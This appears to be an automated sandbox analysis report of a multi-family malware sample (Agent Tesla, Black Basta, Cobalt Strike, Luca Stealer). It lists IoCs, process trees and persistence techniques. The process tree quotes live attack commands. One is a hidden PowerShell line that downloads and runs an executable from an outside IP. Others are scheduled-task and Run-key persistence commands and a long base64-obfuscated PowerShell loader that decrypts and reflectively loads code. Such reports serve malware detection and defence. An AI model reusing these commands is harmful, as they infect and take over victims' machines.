Token: SeDebugPrivilege	5936	powershell.exe
Token: SeDebugPrivilege	5712	powershell.exe
Token: SeDebugPrivilege	2160	powershell.exe
Token: SeDebugPrivilege	996	powershell.exe

Suspicious use of FindShellTrayWindow 3 IoCs

pid	Process
4480	2025-04-06_3c7ae96ac1c51fdbcf240c9b75f53500_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
4480	2025-04-06_3c7ae96ac1c51fdbcf240c9b75f53500_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
4480	2025-04-06_3c7ae96ac1c51fdbcf240c9b75f53500_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe

Suspicious use of SendNotifyMessage 3 IoCs

pid	Process
4480	2025-04-06_3c7ae96ac1c51fdbcf240c9b75f53500_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
4480	2025-04-06_3c7ae96ac1c51fdbcf240c9b75f53500_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
4480	2025-04-06_3c7ae96ac1c51fdbcf240c9b75f53500_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4480 wrote to memory of 5204	4480	2025-04-06_3c7ae96ac1c51fdbcf240c9b75f53500_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	88
PID 4480 wrote to memory of 5204	4480	2025-04-06_3c7ae96ac1c51fdbcf240c9b75f53500_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	88
PID 4480 wrote to memory of 5204	4480	2025-04-06_3c7ae96ac1c51fdbcf240c9b75f53500_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	88
PID 4480 wrote to memory of 1040	4480	2025-04-06_3c7ae96ac1c51fdbcf240c9b75f53500_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	89
PID 4480 wrote to memory of 1040	4480	2025-04-06_3c7ae96ac1c51fdbcf240c9b75f53500_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	89
PID 4480 wrote to memory of 1040	4480	2025-04-06_3c7ae96ac1c51fdbcf240c9b75f53500_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	89
PID 5204 wrote to memory of 1996	5204	cmd.exe	91
PID 5204 wrote to memory of 1996	5204	cmd.exe	91
PID 5204 wrote to memory of 1996	5204	cmd.exe	91
PID 1040 wrote to memory of 4152	1040	mshta.exe	92
PID 1040 wrote to memory of 4152	1040	mshta.exe	92
PID 1040 wrote to memory of 4152	1040	mshta.exe	92
PID 4152 wrote to memory of 1136	4152	powershell.exe	101
PID 4152 wrote to memory of 1136	4152	powershell.exe	101
PID 4152 wrote to memory of 1136	4152	powershell.exe	101
PID 1136 wrote to memory of 5588	1136	TempAKED1656TYVFLRAPMBNXBJNBBXJFE0B4.EXE	103
PID 1136 wrote to memory of 5588	1136	TempAKED1656TYVFLRAPMBNXBJNBBXJFE0B4.EXE	103
PID 1136 wrote to memory of 5588	1136	TempAKED1656TYVFLRAPMBNXBJNBBXJFE0B4.EXE	103
PID 5588 wrote to memory of 4440	5588	rapes.exe	106
PID 5588 wrote to memory of 4440	5588	rapes.exe	106
PID 4440 wrote to memory of 452	4440	5uMVCoG.exe	107
PID 4440 wrote to memory of 452	4440	5uMVCoG.exe	107
PID 1664 wrote to memory of 5884	1664	cmd.exe	111
PID 1664 wrote to memory of 5884	1664	cmd.exe	111
PID 5588 wrote to memory of 5528	5588	rapes.exe	112
PID 5588 wrote to memory of 5528	5588	rapes.exe	112
PID 5588 wrote to memory of 5528	5588	rapes.exe	112
PID 5588 wrote to memory of 2240	5588	rapes.exe	113
PID 5588 wrote to memory of 2240	5588	rapes.exe	113
PID 5588 wrote to memory of 2240	5588	rapes.exe	113
PID 2240 wrote to memory of 720	2240	2a664878e2.exe	115
PID 2240 wrote to memory of 720	2240	2a664878e2.exe	115
PID 2240 wrote to memory of 720	2240	2a664878e2.exe	115
PID 2240 wrote to memory of 720	2240	2a664878e2.exe	115
PID 2240 wrote to memory of 720	2240	2a664878e2.exe	115
PID 2240 wrote to memory of 720	2240	2a664878e2.exe	115
PID 2240 wrote to memory of 720	2240	2a664878e2.exe	115
PID 2240 wrote to memory of 720	2240	2a664878e2.exe	115
PID 2240 wrote to memory of 720	2240	2a664878e2.exe	115
PID 5588 wrote to memory of 5000	5588	rapes.exe	122
PID 5588 wrote to memory of 5000	5588	rapes.exe	122
PID 5588 wrote to memory of 5000	5588	rapes.exe	122
PID 5000 wrote to memory of 940	5000	b6ef7211da.exe	126
PID 5000 wrote to memory of 940	5000	b6ef7211da.exe	126
PID 5000 wrote to memory of 940	5000	b6ef7211da.exe	126
PID 5000 wrote to memory of 940	5000	b6ef7211da.exe	126
PID 5000 wrote to memory of 940	5000	b6ef7211da.exe	126
PID 5000 wrote to memory of 940	5000	b6ef7211da.exe	126
PID 5000 wrote to memory of 940	5000	b6ef7211da.exe	126
PID 5000 wrote to memory of 940	5000	b6ef7211da.exe	126
PID 5000 wrote to memory of 940	5000	b6ef7211da.exe	126
PID 5588 wrote to memory of 1896	5588	rapes.exe	127
PID 5588 wrote to memory of 1896	5588	rapes.exe	127
PID 5588 wrote to memory of 1896	5588	rapes.exe	127
PID 5588 wrote to memory of 740	5588	rapes.exe	129
PID 5588 wrote to memory of 740	5588	rapes.exe	129
PID 5588 wrote to memory of 740	5588	rapes.exe	129
PID 1896 wrote to memory of 5812	1896	YMauSAr.exe	130
PID 1896 wrote to memory of 5812	1896	YMauSAr.exe	130
PID 1896 wrote to memory of 5812	1896	YMauSAr.exe	130
PID 5812 wrote to memory of 5936	5812	javaupdaterw.exe	132
PID 5812 wrote to memory of 5936	5812	javaupdaterw.exe	132
PID 5812 wrote to memory of 5936	5812	javaupdaterw.exe	132
PID 5936 wrote to memory of 2764	5936	javaplatform_service.exe	134

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\2025-04-06_3c7ae96ac1c51fdbcf240c9b75f53500_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
"C:\Users\Admin\AppData\Local\Temp\2025-04-06_3c7ae96ac1c51fdbcf240c9b75f53500_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"
1⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4480
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /create /tn A2BgMmaz3P6 /tr "mshta C:\Users\Admin\AppData\Local\Temp\Ht1CxZOOn.hta" /sc minute /mo 25 /ru "Admin" /f
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:5204
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /tn A2BgMmaz3P6 /tr "mshta C:\Users\Admin\AppData\Local\Temp\Ht1CxZOOn.hta" /sc minute /mo 25 /ru "Admin" /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:1996
- C:\Windows\SysWOW64\mshta.exe
  mshta C:\Users\Admin\AppData\Local\Temp\Ht1CxZOOn.hta
  2⤵
  - Checks computer location settings
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1040
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'AKED1656TYVFLRAPMBNXBJNBBXJFE0B4.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Downloads MZ/PE file
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4152
  - - C:\Users\Admin\AppData\Local\TempAKED1656TYVFLRAPMBNXBJNBBXJFE0B4.EXE
      "C:\Users\Admin\AppData\Local\TempAKED1656TYVFLRAPMBNXBJNBBXJFE0B4.EXE"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Checks computer location settings
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Drops file in Windows directory
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:1136
    - - C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
        
        "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Downloads MZ/PE file
        Checks BIOS information in registry
        Checks computer location settings
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:5588
      - C:\Users\Admin\AppData\Local\Temp\10475710101\5uMVCoG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10475710101\5uMVCoG.exe"
        6⤵
        Checks computer location settings
        Drops startup file
        Executes dropped EXE
        Adds Run key to start application
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4440
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "5uMVCoG" /tr "C:\Users\Admin\AppData\Roaming\5uMVCoG.exe"
        7⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:452
      - C:\Users\Admin\AppData\Local\Temp\10477200101\mtCxnCB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10477200101\mtCxnCB.exe"
        6⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:5528
      - C:\Users\Admin\AppData\Local\Temp\10478680101\2a664878e2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10478680101\2a664878e2.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:2240
        
        C:\Users\Admin\AppData\Local\Temp\svchost015.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10478680101\2a664878e2.exe"
        7⤵
        Downloads MZ/PE file
        Executes dropped EXE
        
        PID:720
      - C:\Users\Admin\AppData\Local\Temp\10478690101\b6ef7211da.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10478690101\b6ef7211da.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:5000
        
        C:\Users\Admin\AppData\Local\Temp\svchost015.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10478690101\b6ef7211da.exe"
        7⤵
        Executes dropped EXE
        
        PID:940
      - C:\Users\Admin\AppData\Local\Temp\10478700101\YMauSAr.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10478700101\YMauSAr.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Modifies system certificate store
        Suspicious use of WriteProcessMemory
        
        PID:1896
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
        7⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:5812
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        8⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:5936
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
        9⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2764
        
        C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe
        10⤵
        Executes dropped EXE
        
        PID:2528
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe
        11⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4244
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe
        12⤵
        Executes dropped EXE
        
        PID:4340
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe
        13⤵
        Executes dropped EXE
        
        PID:2900
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        14⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:6084
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe
        15⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:5220
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
        16⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:3300
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        17⤵
        Executes dropped EXE
        
        PID:1448
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
        18⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4232
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        19⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:3220
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
        20⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2672
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        21⤵
        Executes dropped EXE
        
        PID:4636
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe
        22⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:320
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe
        23⤵
        Executes dropped EXE
        
        PID:552
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe
        24⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1484
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
        25⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2104
        
        C:\Windows\SysWOW64\reg.exe
        
        reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Java Platform SE javaservice_update.exe"
        26⤵
        System Location Discovery: System Language Discovery
        Modifies registry key
        
        PID:1796
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-ItemProperty -Path \"HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" -Name \"Java Platform SE javaservice_update.exe\" -Value '\"C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe\"'"
        26⤵
        Command and Scripting Interpreter: PowerShell
        Adds Run key to start application
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5960
      - C:\Users\Admin\AppData\Local\Temp\10478710101\9sWdA2p.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10478710101\9sWdA2p.exe"
        6⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:740
      - C:\Users\Admin\AppData\Local\Temp\10478720101\70fa95e2d2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10478720101\70fa95e2d2.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious behavior: EnumeratesProcesses
        
        PID:3500
      - C:\Users\Admin\AppData\Local\Temp\10478730101\Rm3cVPI.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10478730101\Rm3cVPI.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:3224
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10478741121\ccosvAs.cmd"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:4676
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:2900
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\10478741121\ccosvAs.cmd"
        7⤵
        
        PID:5736
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:6084
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiR2bWVhcnAgPSBAJw0KJHVzZXJ4Z3dOYW1lIHhndz0gJGVueGd3djpVU0V4Z3dSTkFNRXhndzskdGlzeGd3ID0gIkN4Z3c6XFVzZXhnd3JzXCR1eGd3c2VyTmF4Z3dtZVxkd3hnd20uYmF0eGd3IjtpZiB4Z3coVGVzdHhndy1QYXRoeGd3ICR0aXN4Z3cpIHsgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiQnhnd2F0Y2ggeGd3ZmlsZSB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dDeWFuO3hndyAgICAkeGd3ZmlsZUx4Z3dpbmVzIHhndz0gW1N5eGd3c3RlbS54Z3dJTy5GaXhnd2xlXTo6eGd3UmVhZEF4Z3dsbExpbnhnd2VzKCR0eGd3aXMsIFt4Z3dTeXN0ZXhnd20uVGV4eGd3dC5FbmN4Z3dvZGluZ3hnd106OlVUeGd3RjgpOyB4Z3cgICBmb3hnd3JlYWNoeGd3ICgkbGl4Z3duZSBpbnhndyAkZmlseGd3ZUxpbmV4Z3dzKSB7IHhndyAgICAgeGd3ICBpZiB4Z3coJGxpbnhnd2UgLW1heGd3dGNoICd4Z3deOjo6IHhndz8oLispeGd3JCcpIHt4Z3cgICAgIHhndyAgICAgeGd3ICBXcml4Z3d0ZS1Ib3hnd3N0ICJJeGd3bmplY3R4Z3dpb24gY3hnd29kZSBkeGd3ZXRlY3R4Z3dlZCBpbnhndyB0aGUgeGd3YmF0Y2h4Z3cgZmlsZXhndy4iIC1GeGd3b3JlZ3J4Z3dvdW5kQ3hnd29sb3IgeGd3Q3lhbjt4Z3cgICAgIHhndyAgICAgeGd3ICB0cnl4Z3cgeyAgIHhndyAgICAgeGd3ICAgICB4Z3cgICAkZHhnd2Vjb2RleGd3ZEJ5dGV4Z3dzID0gW3hnd1N5c3RleGd3bS5Db254Z3d2ZXJ0XXhndzo6RnJveGd3bUJhc2V4Z3c2NFN0cnhnd2luZygkeGd3bWF0Y2h4Z3dlc1sxXXhndy5UcmlteGd3KCkpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3ckaW5qZXhnd2N0aW9ueGd3Q29kZSB4Z3c9IFtTeXhnd3N0ZW0ueGd3VGV4dC54Z3dFbmNvZHhnd2luZ106eGd3OlVuaWN4Z3dvZGUuR3hnd2V0U3RyeGd3aW5nKCR4Z3dkZWNvZHhnd2VkQnl0eGd3ZXMpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3dXcml0ZXhndy1Ib3N0eGd3ICJJbmp4Z3dlY3Rpb3hnd24gY29keGd3ZSBkZWN4Z3dvZGVkIHhnd3N1Y2NleGd3c3NmdWx4Z3dseS4iIHhndy1Gb3JleGd3Z3JvdW54Z3dkQ29sb3hnd3IgR3JleGd3ZW47ICB4Z3cgICAgIHhndyAgICAgeGd3ICAgIFd4Z3dyaXRlLXhnd0hvc3QgeGd3IkV4ZWN4Z3d1dGluZ3hndyBpbmpleGd3Y3Rpb254Z3cgY29kZXhndy4uLiIgeGd3LUZvcmV4Z3dncm91bnhnd2RDb2xveGd3ciBZZWx4Z3dsb3c7IHhndyAgICAgeGd3ICAgICB4Z3cgICAgIHhnd0ludm9reGd3ZS1FeHB4Z3dyZXNzaXhnd29uICRpeGd3bmplY3R4Z3dpb25Db3hnd2RlOyAgeGd3ICAgICB4Z3cgICAgIHhndyAgICBieGd3cmVhazt4Z3cgICAgIHhndyAgICAgeGd3ICB9IGN4Z3dhdGNoIHhnd3sgICAgeGd3ICAgICB4Z3cgICAgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiRXhnd3Jyb3IgeGd3ZHVyaW54Z3dnIGRlY3hnd29kaW5neGd3IG9yIGV4Z3d4ZWN1dHhnd2luZyBpeGd3bmplY3R4Z3dpb24gY3hnd29kZTogeGd3JF8iIC14Z3dGb3JlZ3hnd3JvdW5keGd3Q29sb3J4Z3cgUmVkO3hndyAgICAgeGd3ICAgICB4Z3cgIH07IHhndyAgICAgeGd3ICB9OyB4Z3cgICB9O3hnd30gZWxzeGd3ZSB7ICB4Z3cgICAgV3hnd3JpdGUteGd3SG9zdCB4Z3ciU3lzdHhnd2VtIEVyeGd3cm9yOiB4Z3dCYXRjaHhndyBmaWxleGd3IG5vdCB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dSZWQ7IHhndyAgIGV4eGd3aXQ7fTt4Z3dmdW5jdHhnd2lvbiBweGd3c29nbCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGF4Z3dlc192YXhnd3I9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQWVzeGd3XTo6Q3J4Z3dlYXRlKHhndyk7CSRheGd3ZXNfdmF4Z3dyLk1vZHhnd2U9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQ2lweGd3aGVyTW94Z3dkZV06Onhnd0NCQzsJeGd3JGFlc194Z3d2YXIuUHhnd2FkZGlueGd3Zz1bU3l4Z3dzdGVtLnhnd1NlY3VyeGd3aXR5LkN4Z3dyeXB0b3hnd2dyYXBoeGd3eS5QYWR4Z3dkaW5nTXhnd29kZV06eGd3OlBLQ1N4Z3c3OwkkYXhnd2VzX3ZheGd3ci5LZXl4Z3c9W1N5c3hnd3RlbS5DeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygnVUNEeGd3ZFZ6U3Z4Z3dDMUNvOXhnd1VWb1B1eGd3RXRvVWR4Z3duNzZsQ3hndytPV0tJeGd3OG5qRGV4Z3dxTDZ4MHhndz0nKTsJeGd3JGFlc194Z3d2YXIuSXhnd1Y9W1N5eGd3c3RlbS54Z3dDb252ZXhnd3J0XTo6eGd3RnJvbUJ4Z3dhc2U2NHhnd1N0cmlueGd3ZygnK2F4Z3cvRHp3NHhnd1ZRR1g3eGd3L1J0Y0h4Z3dQQkpWd3hndz09Jyk7eGd3CSRkZWN4Z3dyeXB0b3hnd3JfdmFyeGd3PSRhZXN4Z3dfdmFyLnhnd0NyZWF0eGd3ZURlY3J4Z3d5cHRvcnhndygpOwkkeGd3cmV0dXJ4Z3duX3Zhcnhndz0kZGVjeGd3cnlwdG94Z3dyX3Zhcnhndy5UcmFueGd3c2Zvcm14Z3dGaW5hbHhnd0Jsb2NreGd3KCRwYXJ4Z3dhbV92YXhnd3IsIDAseGd3ICRwYXJ4Z3dhbV92YXhnd3IuTGVueGd3Z3RoKTt4Z3cJJGRlY3hnd3J5cHRveGd3cl92YXJ4Z3cuRGlzcHhnd29zZSgpeGd3OwkkYWV4Z3dzX3Zhcnhndy5EaXNweGd3b3NlKCl4Z3c7CSRyZXhnd3R1cm5feGd3dmFyO314Z3dmdW5jdHhnd2lvbiBzeGd3dGF4cCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGh4Z3dwaGM9Tnhnd2V3LU9ieGd3amVjdCB4Z3dTeXN0ZXhnd20uSU8ueGd3TWVtb3J4Z3d5U3RyZXhnd2FtKCwkeGd3cGFyYW14Z3dfdmFyKXhndzsJJGlzeGd3d2hiPU54Z3dldy1PYnhnd2plY3QgeGd3U3lzdGV4Z3dtLklPLnhnd01lbW9yeGd3eVN0cmV4Z3dhbTsJJHhnd2Zsc2l6eGd3PU5ldy14Z3dPYmplY3hnd3QgU3lzeGd3dGVtLkl4Z3dPLkNvbXhnd3ByZXNzeGd3aW9uLkd4Z3daaXBTdHhnd3JlYW0oeGd3JGhwaGN4Z3csIFtJT3hndy5Db21weGd3cmVzc2l4Z3dvbi5Db3hnd21wcmVzeGd3c2lvbk14Z3dvZGVdOnhndzpEZWNveGd3bXByZXN4Z3dzKTsJJHhnd2Zsc2l6eGd3LkNvcHl4Z3dUbygkaXhnd3N3aGIpeGd3OwkkZmx4Z3dzaXouRHhnd2lzcG9zeGd3ZSgpOwl4Z3ckaHBoY3hndy5EaXNweGd3b3NlKCl4Z3c7CSRpc3hnd3doYi5EeGd3aXNwb3N4Z3dlKCk7CXhndyRpc3doeGd3Yi5Ub0F4Z3dycmF5KHhndyk7fWZ1eGd3bmN0aW94Z3duIGhlenhnd2d4KCRweGd3YXJhbV94Z3d2YXIsJHhnd3BhcmFteGd3Ml92YXJ4Z3cpewkkbnhnd3g9W1N5eGd3c3RlbS54Z3dSZWZsZXhnd2N0aW9ueGd3LkFzc2V4Z3dtYmx5XXhndzo6KCdkeGd3YW9MJ1t4Z3ctMS4uLXhndzRdIC1qeGd3b2luICd4Z3cnKShbYnhnd3l0ZVtdeGd3XSRwYXJ4Z3dhbV92YXhnd3IpOwkkeGd3bGF6PSR4Z3dueC5Fbnhnd3RyeVBveGd3aW50Owl4Z3ckbGF6Lnhnd0ludm9reGd3ZSgkbnV4Z3dsbCwgJHhnd3BhcmFteGd3Ml92YXJ4Z3cpO30kaHhnd29zdC5VeGd3SS5SYXd4Z3dVSS5XaXhnd25kb3dUeGd3aXRsZSB4Z3c9ICR0aXhnd3M7JGxveGd3Zj1bU3l4Z3dzdGVtLnhnd0lPLkZpeGd3bGVdOjp4Z3coJ3R4ZXhnd1RsbEFkeGd3YWVSJ1t4Z3ctMS4uLXhndzExXSAteGd3am9pbiB4Z3cnJykoJHhnd3RpcykueGd3U3BsaXR4Z3coW0Vudnhnd2lyb25teGd3ZW50XTp4Z3c6TmV3THhnd2luZSk7eGd3Zm9yZWF4Z3djaCAoJHhnd3pwamxweGd3IGluICR4Z3dsb2YpIHhnd3sJaWYgeGd3KCR6cGp4Z3dscC5TdHhnd2FydHNXeGd3aXRoKCd4Z3c6OiAnKXhndykJewkJeGd3JGdxYnN4Z3c9JHpwanhnd2xwLlN1eGd3YnN0cml4Z3duZygzKXhndzsJCWJyeGd3ZWFrOwl4Z3d9fSRpdXhnd3A9W3N0eGd3cmluZ1t4Z3ddXSRncXhnd2JzLlNweGd3bGl0KCd4Z3dcJyk7JHhnd25sdD1zeGd3dGF4cCB4Z3cocHNvZ3hnd2wgKFtDeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygkaXVweGd3WzBdKSl4Z3cpOyRqZXhnd2J0PXN0eGd3YXhwICh4Z3dwc29nbHhndyAoW0NveGd3bnZlcnR4Z3ddOjpGcnhnd29tQmFzeGd3ZTY0U3R4Z3dyaW5nKHhndyRpdXBbeGd3MV0pKSl4Z3c7aGV6Z3hnd3ggJG5seGd3dCAkbnV4Z3dsbDtoZXhnd3pneCAkeGd3amVidCB4Z3coLFtzdHhnd3JpbmdbeGd3XV0gKCd4Z3clKicpKXhndzsNCidADQoNCiRybGpmcnAgPSAkdm1lYXJwIC1yZXBsYWNlICd4Z3cnLCAnJw0KDQpJbnZva2UtRXhwcmVzc2lvbiAkcmxqZnJwDQo=')) | Invoke-Expression"
        8⤵
        Blocklisted process makes network request
